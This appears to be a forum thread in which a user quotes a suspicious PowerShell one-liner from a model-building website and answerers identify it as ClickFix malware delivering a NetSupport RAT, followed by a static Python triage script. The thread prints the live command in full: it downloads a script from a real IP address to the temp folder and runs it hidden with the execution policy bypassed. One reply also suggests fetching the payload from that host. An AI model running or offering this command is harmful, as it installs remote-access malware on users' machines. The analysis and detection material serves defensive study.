I stumbled upon an old model building website and found a command that looked suspicious, so I copied it to take a closer look. Here's what it says:
`powershell -w h -nop -c "$wgh='http://87.120.126.150/RiH.lim';$uka="$env:TEMP/cuwhz.ps1";Invoke-RestMethod -Uri $wgh -OutFile $uka;powershell -w h -ep bypass -f $uka"`
I'm curious if anyone can shed light on what this command might execute?
6 Answers
You're probably right, that’s some ClickFix malware in action. The site you found is likely fake or hacked. It fetches a file to your temp directory and runs it—probably with more hidden downloads along the way!
What are you hoping to find out by analyzing this script? Just curious about the site replacement or something else?
Looks like this is part of a NetSupport RAT payload via ClickFix. The long base64 strings and file size suggest some sort of malware is being deployed. Check out [this overview on ClickFix](https://alertoverload.com/posts/2025/05/clickfix---an-overview/) for more details!
Basically, this command is set to download malware or potentially unwanted programs from that IP and execute it immediately. Definitely a red flag!
Why not just run part of the command? Avoid executing the part that calls PowerShell and the $uka variable. You can use 'invoke-restmethod' on that IP to see what it's trying to deliver. Please update us after checking it out!
This command seems to download a script named 'cuwhz.ps1' from the specified IP address and then runs it. I can't imagine what the script contains, but it's likely not good news!

I’d prefer not to test it out; I just wanted to know what was going on with that modeling site!
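
The answers above describe the command as hidden window, download to the temp directory, then execution with the policy bypassed. The sketch below is an added example, not part of the original thread: it reads those facts out of the command text with string matching only, without running or fetching anything. The names `triage` and `is_param` are hypothetical, and the parameter-abbreviation handling is a simplification.

```python
import re

# The command quoted in the question, kept as inert text; nothing below executes it.
SAMPLE = ('powershell -w h -nop -c "$wgh=\'http://87.120.126.150/RiH.lim\';'
          '$uka="$env:TEMP/cuwhz.ps1";Invoke-RestMethod -Uri $wgh -OutFile $uka;'
          'powershell -w h -ep bypass -f $uka"')

def is_param(flag, full, alias=None, min_len=1):
    """True if flag abbreviates parameter `full` (prefix of min_len+) or equals alias."""
    return flag == alias or (len(flag) >= min_len and full.startswith(flag))

def triage(cmd):
    """Statically describe a pasted PowerShell one-liner; the command is never run."""
    # $name='value' or $name="value" assignments, used to resolve -Uri $x / -OutFile $y
    variables = {n.lower(): v for n, _, v in
                 re.findall(r"\$(\w+)\s*=\s*(['\"])(.*?)\2", cmd)}

    def resolve(value):
        return variables.get(value[1:].lower(), value) if value.startswith("$") else value

    # Every "-flag value" pair; a value never starts with "-" and ends at a quote or ";".
    # Simplification: powershell.exe and cmdlet parameters share one list.
    pairs = [(f.lower(), resolve(v)) for f, v in
             re.findall(r"(?<![\w$])-(\w+)(?:\s+(?!-)([^\s;\"']+))?", cmd)]

    def value_of(full, alias=None, min_len=1):
        return next((v for f, v in pairs if v and is_param(f, full, alias, min_len)), None)

    url, outfile, script = value_of("uri"), value_of("outfile"), value_of("file")
    window = value_of("windowstyle")
    policy = value_of("executionpolicy", "ep", 2)
    indicators = []
    if window and "hidden".startswith(window.lower()):
        indicators.append("hidden window")
    if any(is_param(f, "noprofile", "nop", 3) for f, _ in pairs):
        indicators.append("profile skipped")
    if policy and policy.lower() == "bypass":
        indicators.append("execution policy bypass")
    if url and outfile and re.search(r"(?i)\b(invoke-restmethod|invoke-webrequest|irm|iwr)\b", cmd):
        indicators.append("remote content written to disk")
    if outfile and script == outfile:
        indicators.append("downloaded file executed")
    return {"url": url, "outfile": outfile, "indicators": indicators}

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The same function can be pointed at process-creation or Run-dialog history entries to flag command lines that combine these traits.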